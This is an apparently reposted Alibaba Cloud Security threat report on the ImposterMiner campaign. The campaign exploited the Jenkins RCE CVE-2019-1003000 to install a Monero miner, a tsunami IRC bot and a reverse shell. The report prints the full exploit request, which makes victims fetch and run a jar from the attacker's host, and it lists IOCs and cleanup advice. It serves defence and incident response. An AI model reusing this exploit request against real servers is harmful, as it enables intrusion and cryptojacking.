威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿***新“跳板”

╰+攻爆jí腚メ 2022-01-12 23:45 209阅读 0赞

简介  
阿里云安全于近日捕获到一起使用Jenkins RCE漏洞进行\*\*\*的挖矿事件。除挖矿外，\*\*\*者还曾植入具有C&C功能的tsunami\*\*\*，也预留了反弹shell的功能，给用户带来极大安全隐患。

由于\*\*\*者直接复制了Jenkins系列漏洞发现者（Orange.tw）在博客上公布的poc，\*\*\*payload含有"Orange.tw"字样，可能被误认为是漏洞发现者在进行测试，因此我们将\*\*\*命名为ImposterMiner（冒充者）。

本次事件具有两个特点：一是ImposterMiner\*\*\*开始爆发的时间距离Jenkins漏洞利用方法公开的时间极短，仅相隔2天；二是仅靠web漏洞直接\*\*\*，不具有蠕虫传染性。这两点与不久前利用Nexus Repository Manager 3新漏洞进行\*\*\*的watchbog挖矿\*\*\*事件较为相似。

本文将分析ImposterMiner挖矿\*\*\*的结构，并就如何清理、预防类似挖矿\*\*\*给出安全建议。

ImposterMiner挖矿\*\*\*分析  
![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner]

上图展示了ImposterMiner挖矿\*\*\*的感染流程。\*\*\*者首先使用如下payload\*\*\*jenkins服务

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27orange.tw%27,%20root=%27http://45.55.211.79/%27)%0a@Grab(group=%27tw.orange%27,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1  
Host:【victim\_host】:【jenkins\_port】  
该payload使用了CVE-2019-1003000这个jenkins RCE（远程命令执行）漏洞，导致受害主机请求http://45.55.211.79/tw/orange/poc/8/poc-8.jar文件，并在本地执行。这里不难发现，\*\*\*者只是简单修改了漏洞发现者博客上公开的代码，因而直接以orange.tw（漏洞发现者的名字）和poc(Proof of Concept，能够证明漏洞存在的代码，通常点到为止不造成实际损害)作为项目和模块名，乍看之下，非常容易将此次\*\*\*误认为漏洞作者进行的无害的安全测试。

poc-8.jar的代码如下

![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 1]

其中请求的http://45.55.211.79/.cache/jenkins/n2.sh脚本，将会创建/tmp/.scr文件夹，并请求下载45.55.211.79/.cache/jenkins/s.tar.gz：

![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 2]

解压s.tar.gz得到如下左图所示文件夹，并运行右图中的go脚本，根据当前机器的架构，选择运行i686或x86\_64。

![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 3]

i686和x86\_64这两个程序都是xmrig改写而成的矿机，主要在nanopool.com矿池进行挖矿。它们还会将自身写入crontab文件，每分钟执行，进行持久化，此处不再赘述。

![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 4]

此外，45.55.211.79服务器上存有多种历史上曾经使用，或尚未启用的payload。

![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 5]

例如3月7日，阿里云安全曾捕获到\*\*\*者使用图中文件夹poc/5/poc-5.jar中的payload，会导致被\*\*\*主机下载解压并运行http://45.55.211.79/.cache/jenkins/jks.tar.gz。该压缩包中包括tsunami\*\*\*变种，能够通过IRC接收下发指令并执行各种\*\*\*，如下图所示。

![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 6]

又例如http://45.55.211.79/.cache/jenkins/jen.pl会使被\*\*\*主机反弹shell到190.121.18.164:1090

![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 7]

以上这些恶意文件的最后修改日期说明ImposterMiner的作者依然在频繁进行更新，同时还说明作者并不满足于在受害者主机上安静挖矿，而是时刻准备着将受害主机用作ddos肉鸡，或使用shell对主机进行任意操纵。

影响范围  
根据阿里云安全监控到的\*\*\*趋势（如下图），ImposterMiner挖矿\*\*\*从漏洞公布后仅两天（2月21日）就开始利用其进行\*\*\*和挖矿，给用户留下的修复时间窗口非常小。

\*\*\*数量于3月3日左右达到最高峰，并且至今仍保持着较高的水平。

![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 8]

\*\*\*趋势示意\*\*\*趋势示意

ImposterMiner恶意挖矿\*\*\*当前使用的钱包地址为：42X5Nwfs6kPcK5xZaV1mxnLpSqYst9d46Dx63tdtmHFZWdWPryNt5ZhZXFXLYm2yZLZt7xXC5zerGbqQi2X1MsTzA9whw2X

从矿池数据看出，该地址HashRate波动较大，最高时达到236KH/s，平均值在150KH/s左右，可能已有1~2万台服务器被\*\*\*挖矿。该钱包地址累计收益为169门罗币左右，约合9120美元。

![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 9]

除了上述地址外，\*\*\*者还使用过至少一个不同的钱包地址：4B6GzzkQBgqbMraFa2FMnk4jKzFvxcqGNApKn6AK91R6KFgiWDKzhgWS864egV4HuHetns7yfYP9NDq234yxfNKEJWR4ga5。

安全建议  
Jenkins作为最受欢迎的持续集成(CI)工具，使用量很大。上一次Jenkins远程命令执行漏洞(CVE-2017-1000353)的曝光，导致了“史上最大规模挖矿事件之一”，\*\*\*者收益逾300万美元。

因此，Jenkins漏洞可能造成影响的范围巨大。这也导致逐利的\*\*\*者对Jenkins虎视眈眈，一有新的漏洞便迅速加以利用；这次RCE漏洞从公开到开始被黑产利用仅花了2天，就是很好的证明。

针对此次安全事件，阿里云安全给出以下预防和清理建议：

用户应及时升级包括Jenkins在内的各种软件，避免遭受类似此次ImposterMiner挖矿\*\*\*以Jenkins作为入口的\*\*\*，导致生产系统的其他部分一并沦陷。怀疑已经受到感染的用户，可自查主机是否存在/tmp/.scr恶意目录，并根据自身情况考虑清空/tmp目录；使用ps命令查看是否存在名为"-bash"恶意进程；自查并清理crontab相关文件。  
建议使用阿里云安全的下一代云防火墙产品，其阻断恶意外联、能够配置智能策略的功能，能够有效帮助防御\*\*\*。哪怕\*\*\*者在主机上的隐藏手段再高明，下载、挖矿、反弹shell这些操作，都需要进行恶意外联；云防火墙的拦截将彻底阻断\*\*\*链。此外，用户还可以通过自定义策略，直接屏蔽恶意网站，达到阻断\*\*\*的目的。  
对于有更高定制化要求的用户，可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务，定制适合您的方案，帮助加固系统，预防\*\*\*。\*\*\*事件发生后，也可介入直接协助\*\*\*后的清理、事件溯源等，适合有较高安全需求的用户，或未雇佣安全工程师，但希望保障系统安全的企业。  
IOC  
钱包地址：  
4B6GzzkQBgqbMraFa2FMnk4jKzFvxcqGNApKn6AK91R6KFgiWDKzhgWS864egV4HuHetns7yfYP9NDq234yxfNKEJWR4ga5  
42X5Nwfs6kPcK5xZaV1mxnLpSqYst9d46Dx63tdtmHFZWdWPryNt5ZhZXFXLYm2yZLZt7xXC5zerGbqQi2X1MsTzA9whw2X

矿池地址：  
[https://www.supportxmr.com][https_www.supportxmr.com]  
[https://xmr.nanopool.org][https_xmr.nanopool.org]

恶意程序：  
![威胁快报|首爆，新披露Jenkins RCE漏洞成ImposterMiner挖矿\*\*\*新“跳板”][Jenkins RCE_ImposterMiner 10]

恶意url：  
[http://45.55.211.79/.cache/jenkins/][http_45.55.211.79_.cache_jenkins]  
*[http://45.55.211.79/tw/orange/poc/][http_45.55.211.79_tw_orange_poc]*

恶意主机：  
190.121.18.164

Reference  
[http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html][http_blog.orange.tw_2019_02_abusing-meta-programming-for-unauthenticated-rce.html]  
[https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/][https_research.checkpoint.com_jenkins-miner-one-biggest-mining-operations-ever-discovered]

本文作者：悟泛、目明

转载于:https://blog.51cto.com/14031893/2375327

[Jenkins RCE_ImposterMiner]: https://s1.51cto.com/images/blog/201904/08/e2c013022c392636177c55b64c07cf63.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[Jenkins RCE_ImposterMiner 1]: https://s1.51cto.com/images/blog/201904/08/141c01549866c90ea646e6a5afe20c8a.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[Jenkins RCE_ImposterMiner 2]: https://s1.51cto.com/images/blog/201904/08/55ed5dc6bf5c82098911f12b4912fc70.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[Jenkins RCE_ImposterMiner 3]: https://s1.51cto.com/images/blog/201904/08/e9e80e370985e2e0abd61866695f9ae4.jpeg?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[Jenkins RCE_ImposterMiner 4]: https://s1.51cto.com/images/blog/201904/08/62b88bfb67626f809e3e2aae0b0ddbd2.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[Jenkins RCE_ImposterMiner 5]: https://s1.51cto.com/images/blog/201904/08/bcf2eaa142aba2082f30d2b0cdffe86e.jpeg?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[Jenkins RCE_ImposterMiner 6]: https://s1.51cto.com/images/blog/201904/08/e23daf6d511194ab8d47b58dcbcdb931.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[Jenkins RCE_ImposterMiner 7]: https://s1.51cto.com/images/blog/201904/08/7e5a2f884ef9b1e5c10f85ce9befe6e6.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[Jenkins RCE_ImposterMiner 8]: https://s1.51cto.com/images/blog/201904/08/cf54d79c1b6194b158d5ea9d367f9619.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[Jenkins RCE_ImposterMiner 9]: https://s1.51cto.com/images/blog/201904/08/5524ef2e9eb1d78165adbb1449c1471e.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[https_www.supportxmr.com]: https://www.supportxmr.com
[https_xmr.nanopool.org]: https://xmr.nanopool.org
[Jenkins RCE_ImposterMiner 10]: https://s1.51cto.com/images/blog/201904/08/c8a608dd4cd3f61e2b92772cb7eaa802.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=
[http_45.55.211.79_.cache_jenkins]: http://45.55.211.79/.cache/jenkins/
[http_45.55.211.79_tw_orange_poc]: http://45.55.211.79/tw/orange/poc/
[http_blog.orange.tw_2019_02_abusing-meta-programming-for-unauthenticated-rce.html]: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
[https_research.checkpoint.com_jenkins-miner-one-biggest-mining-operations-ever-discovered]: https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/